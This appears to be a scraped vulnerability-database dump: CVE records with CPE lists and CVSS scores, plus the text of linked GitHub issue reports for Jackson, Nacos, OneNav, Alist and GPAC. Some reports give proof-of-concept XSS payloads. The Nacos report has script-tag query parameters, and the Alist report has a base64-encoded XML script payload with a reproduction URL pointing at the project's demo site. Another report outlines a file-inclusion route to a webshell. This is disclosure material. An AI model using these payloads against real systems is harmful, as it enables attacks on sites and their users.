"versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_enterprise_case_management:8.0.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "D4BDDBCD-4038-4BEC-91DB-587C2FBC6369", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_enterprise_case_management:8.0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F6394E90-2F2C-4955-9F97-BFED76D4333B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_enterprise_case_management:8.0.8.1:*:*:*:*:*:*:*", "matchCriteriaId": "5B5DC0C1-789B-4126-8C6D-DEDE83AA2D2E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_trade-based_anti_money_laundering:8.0.7:*:*:*:enterprise:*:*:*", "matchCriteriaId": "B57ECC6E-CC64-4DE7-B657-3BA54EDDFFF4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:financial_services_trade-based_anti_money_laundering:8.0.8:*:*:*:enterprise:*:*:*", "matchCriteriaId": "10BBAD37-51A1-4819-807B-2642E9D4A69C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_nextgen_oui_framework:*:*:*:*:*:*:*:*", "matchCriteriaId": "EE85204F-614D-4EF1-ABEB-B3CD381C2CB0", "versionEndExcluding": "13.9.4.2.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_nextgen_oui_framework:13.9.4.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "5A6FFB5C-EB44-499F-BE81-24ED2B1F201A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "8F0728F8-14D0-4282-9CA7-EFCD68EE77AF", "versionEndExcluding": "12.2.0.1.30", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:graph_server_and_client:*:*:*:*:*:*:*:*", "matchCriteriaId": "097A31AB-B77F-4DC5-9CD8-AC3A403607AA", "versionEndExcluding": "22.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:health_sciences_empirica_signal:9.1.0.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "42F4D251-489F-41C8-BFA3-B51A1B69028D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", "matchCriteriaId": "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.59:*:*:*:*:*:*:*", "matchCriteriaId": "C8AF00C6-B97F-414D-A8DF-057E6BFD8597", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", "matchCriteriaId": "8B1C88FD-C2EC-4C96-AC7E-6F95C8763B48", "versionEndExcluding": null, "versionEndIncluding": "17.12.11", "versionStartExcluding": null, "versionStartIncluding": "17.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", "matchCriteriaId": "F04DF183-EBCB-456E-90F9-A8500E6E32B7", "versionEndExcluding": null, "versionEndIncluding": "18.8.14", "versionStartExcluding": null, "versionStartIncluding": "18.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", "matchCriteriaId": "8D30B0D1-4466-4601-8822-CE8ADBB381FB", "versionEndExcluding": null, "versionEndIncluding": "19.12.13", "versionStartExcluding": null, "versionStartIncluding": "19.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", "matchCriteriaId": "17DE4709-5FFB-4E70-9416-553D89149D51", "versionEndExcluding": null, "versionEndIncluding": "20.12.18", "versionStartExcluding": null, "versionStartIncluding": "20.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", "matchCriteriaId": "2982311E-B89A-4F9A-8BD2-44635DDDC10B", "versionEndExcluding": null, "versionEndIncluding": "21.12.1", "versionStartExcluding": null, "versionStartIncluding": "21.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", "matchCriteriaId": "050C3F61-FD74-4B62-BBC7-FFF05B22FB34", "versionEndExcluding": null, "versionEndIncluding": "17.12.20.4", "versionStartExcluding": null, "versionStartIncluding": "17.12.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD0A17FC-BFA9-4EA5-8D4F-1CEC5BC11AA7", "versionEndExcluding": null, "versionEndIncluding": "18.8.25.4", "versionStartExcluding": null, "versionStartIncluding": "18.8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", "matchCriteriaId": "5BC6277C-7C2F-49E1-8A68-4C726A087F74", "versionEndExcluding": null, "versionEndIncluding": "19.12.19.0", "versionStartExcluding": null, "versionStartIncluding": "19.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", "matchCriteriaId": "C383F1DE-32E0-4E77-9C5F-2D91893F458E", "versionEndExcluding": null, "versionEndIncluding": "21.12.4.0", "versionStartExcluding": null, "versionStartIncluding": "20.12.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", "matchCriteriaId": "5AFBEE29-1972-40B1-ADD6-536D5C74D4EA", "versionEndExcluding": null, "versionEndIncluding": "17.12", "versionStartExcluding": null, "versionStartIncluding": "17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:18.0:*:*:*:*:*:*:*", "matchCriteriaId": "951EC479-1B04-49C9-8381-D849685E7517", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:20.12:*:*:*:*:*:*:*", "matchCriteriaId": "38340E3C-C452-4370-86D4-355B6B4E0A06", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:21.12:*:*:*:*:*:*:*", "matchCriteriaId": "E9C55C69-E22E-4B80-9371-5CD821D79FE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_sales_audit:15.0.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "5B32D7B0-CAE2-4B31-94C4-6124356C12B2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:sd-wan_edge:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "77E39D5C-5EFA-4FEB-909E-0A92004F2563", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:sd-wan_edge:9.1:*:*:*:*:*:*:*", "matchCriteriaId": "06816711-7C49-47B9-A9D7-FB18CC3F42F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:spatial_studio:*:*:*:*:*:*:*:*", "matchCriteriaId": "7E244A7B-EB39-4A84-BB01-EB09037A701F", "versionEndExcluding": "20.1.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.3.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "A5BBA303-8D2B-48C5-B52A-4E192166699C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.3.0.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "8DF02546-3F0D-4FDD-89B1-8A3FE43FB5BF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "3F906F04-39E4-4BE4-8A73-9D058AAADB43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "7B393A82-476A-4270-A903-38ED4169E431", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "85CAE52B-C2CA-4C6B-A0B7-2B9D6F0499E2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_framework:4.4.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "B4DAAD73-FE86-4934-AB1A-A60E840C6C1E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "04BCDC24-4A21-473C-8733-0D9CFB38A752", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*", "matchCriteriaId": "F3E0B672-3E06-4422-B2A4-0BD073AEC2A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "matchCriteriaId": "B55E8D50-99B4-47EC-86F9-699B67D473CE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:cloud_insights_acquisition_unit:-:*:*:*:*:*:*:*", "matchCriteriaId": "CCAA4004-9319-478C-9D55-0E8307F872F6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "matchCriteriaId": "F1BE6C1F-2565-4E97-92AA-16563E5660A5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:*", "matchCriteriaId": "9F4754FB-E3EB-454A-AB1A-AE3835C5350C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/FasterXML/jackson-databind/issues/2816
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
**EDIT**: related to to CVE-2020-36518 (see https://nvd.nist.gov/vuln/detail/CVE-2020-36518) **EDIT**: Fix included in * 2.14.0 * 2.13.3: * Was also included in 2.13.2.1 and 2.13.2.2 (see https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.13); to be used with `jackson-bom` version `2.13.2.20220328` * 2.12.6.1: (see https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.12) * use with `jackson-bom` version `2.12.6.1.20220326` **EDIT**: included as one of Snyk's "top-10 vulns of 2022" CVEs -- see https://go.snyk.io/snyk-top-10-open-source-vulnerabilities-dwn-typ.html ----- Current implementation `UntypedObjectDeserializer` is relatively expensive for deeply nested Object and Array values as it uses recursion even for "vanilla" case (one where there are no custom `List`/array or `Map` deserializers). In practical terms it is possible to exhaust typical modest JVM memory with documents having about ten thousand levels of nestings, due to size of call stack from recursive calls. *NOTE*: specifically this ONLY APPLIES if the target type is "untyped" or generic `Collection<Object>` / `Map<String, Object>` -- it DOES NOT APPLY to cases where target is POJO (except if POJO itself has "untyped" property or properties). Similar issue was already solved wrt `JsonNode` (see #3397), included in 2.13.0; this might show a way to approach this problem: by replacing simple recursion with iteration, either completely or at some inner levels. Also note that it may ultimately be necessary to have lower-level constraints for streaming parser too, see: https://github.com/FasterXML/jackson-core/issues/637 Ideally it should be: 1. Possible to handle at least tens of thousands of levels of nesting (100k should be processable with 256M heap, say) 2. Have streaming level limits that -- by default -- block documents with more than limit we deem safe (less than 100k -- perhaps 10k or something, to be determined). This issue is specifically about (1) as (2) is about `jackson-core`.
Optimize `UntypedObjectDeserializer` wrt recursion [CVE-2020-36518]
https://api.github.com/repos/FasterXML/jackson-databind/issues/2816/comments
77
2020-08-13T01:12:31Z
2022-11-18T17:40:21Z
https://github.com/FasterXML/jackson-databind/issues/2816
678,075,273
2,816
3,332
CVE-2021-44667
2022-03-11T19:15:09.023
A Cross Site Scripting (XSS) vulnerability exists in Nacos 2.0.3 in auth/users via the (1) pageSize and (2) pageNo parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7359" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7359" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alibaba:nacos:2.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "17F01261-A90A-47BA-AD51-79329B2CAB90", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/alibaba/nacos/issues/7359
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "alibaba", "nacos" ]
Nacos has xss vulnerability Trigger condition: no verification required version: Nacos 2.0.3 payload1:`/nacos/v1/auth/users?pageNo=1&pageSize=<script>alert(1)</script>` payload2:`/nacos/v1/auth/users?pageNo=<script>alert(1)</script>&pageSize=1` ![image](https://user-images.githubusercontent.com/95545320/144721786-8d395d45-3e32-4280-a2db-3693994188ab.png) ![image](https://user-images.githubusercontent.com/95545320/144722442-85f6b25c-4493-42d2-aae9-4284ad2148e9.png)
This is XSS vulnerabilities
https://api.github.com/repos/alibaba/nacos/issues/7359/comments
2
2021-12-04T19:23:34Z
2022-06-06T14:22:31Z
https://github.com/alibaba/nacos/issues/7359
1,071,277,772
7,359
3,333
CVE-2022-26276
2022-03-12T01:15:35.240
An issue in index.php of OneNav v0.9.14 allows attackers to perform directory traversal.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/helloxz/onenav/issues/44" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/helloxz/onenav/issues/44" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onenav:onenav:0.9.14:*:*:*:*:*:*:*", "matchCriteriaId": "4DA02DB7-4E32-4E42-8A01-0CE6D7B7D9FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/helloxz/onenav/issues/44
[ "Third Party Advisory" ]
github.com
[ "helloxz", "onenav" ]
### 漏洞简介 Vulnerability Introduction 由于index.php存在拼接且未经过滤的可控参数文件包含,可以进行路径穿越包含php原生pearcmd.php导致写入恶意文件Getshell。 Due to the inclusion of spliced and unfiltered controllable parameter files in index.php, path traversal can be performed to include php native pearcmd.php resulting in the writing of the malicious file getshell.
OneNav has directory traversal with file inclusion that can lead to Getshell
https://api.github.com/repos/helloxz/onenav/issues/44/comments
2
2022-02-25T06:00:26Z
2022-03-12T03:19:38Z
https://github.com/helloxz/onenav/issues/44
1,150,075,677
44
3,334
CVE-2022-26533
2022-03-12T01:15:35.843
Alist v2.1.0 and below was discovered to contain a cross-site scripting (XSS) vulnerability via /i/:data/ipa.plist.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Xhofe/alist/issues/645" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Xhofe/alist/issues/645" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alist_project:alist:*:*:*:*:*:*:*:*", "matchCriteriaId": "4B7623B9-7203-4C19-893D-C2DFCE6B4F81", "versionEndExcluding": null, "versionEndIncluding": "2.1.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Xhofe/alist/issues/645
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Xhofe", "alist" ]
### Alist Version / Alist 版本 v2.0.10-v2.1.0 ### Describe the bug / 问题描述 ## Vulnerability Introduction A route in Alist that uses user-inputted parameters when displaying xml files and does not filter them can cause xss. Vulnerability affects version: v2.0.10-v2.1.0 ## Vulnerability Analysis A new route was added in Alist v2.0.10: `/i/:data/ipa.plist`, which allows users to control the data parameter in path. ![image](https://user-images.githubusercontent.com/66706544/156100081-03cb9800-adcd-4b62-9fe9-df1633941333.png) Simplified code: ```go func Plist(c *gin.Context) { data := c.Param("data") data = strings.ReplaceAll(data, "_", "/") data = strings.ReplaceAll(data, "-", "=") bytes, err := base64.StdEncoding.DecodeString(data) if err != nil { common.ErrorResp(c, err, 500) return } u := string(bytes) plist := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> ... <string>%s</string> ... <string>ci.nn.%s</string> ... <string>%s</string> ... `, u, name, name) c.Header("Content-Type", "application/xml;charset=utf-8") c.Status(200) _, _ = c.Writer.WriteString(plist) ``` The incoming data is decoded by replacing (recovering the original base64 encoded url conflict characters), and then the parameter `u` is directly spliced and output to the page, so we can use this to construct the xss payload. ``` <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(1)</a:script> ``` The paylod is base64 encoded as follows: ``` PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4= ``` Replace `=` with `-`, then splice in the path: ``` http(https)://<host:port>/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist ``` ## Vulnerability Exploitation After a successful local exploit, try using the official demo site to test: ![image](https://user-images.githubusercontent.com/66706544/156100105-82fbd87f-e19b-4797-809d-05d6b47af9ba.png) ### Reproduction / 复现链接 https://alist.xhofe.top/i/PGE6c2NyaXB0IHhtbG5zOmE9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPmFsZXJ0KDEpPC9hOnNjcmlwdD4-/ipa.plist ### 日志 / Logs _No response_
Alist has Cross Site Scripting (XSS) vulnerability
https://api.github.com/repos/AlistGo/alist/issues/645/comments
3
2022-03-01T03:38:23Z
2022-03-12T03:21:49Z
https://github.com/AlistGo/alist/issues/645
1,154,821,631
645
3,335
CVE-2022-26967
2022-03-12T22:15:08.757
GPAC 2.0 allows a heap-based buffer overflow in gf_base64_encode. It can be triggered via MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2138" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2138" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "22E296B6-C912-468A-8A88-EC33272D81FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2138
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
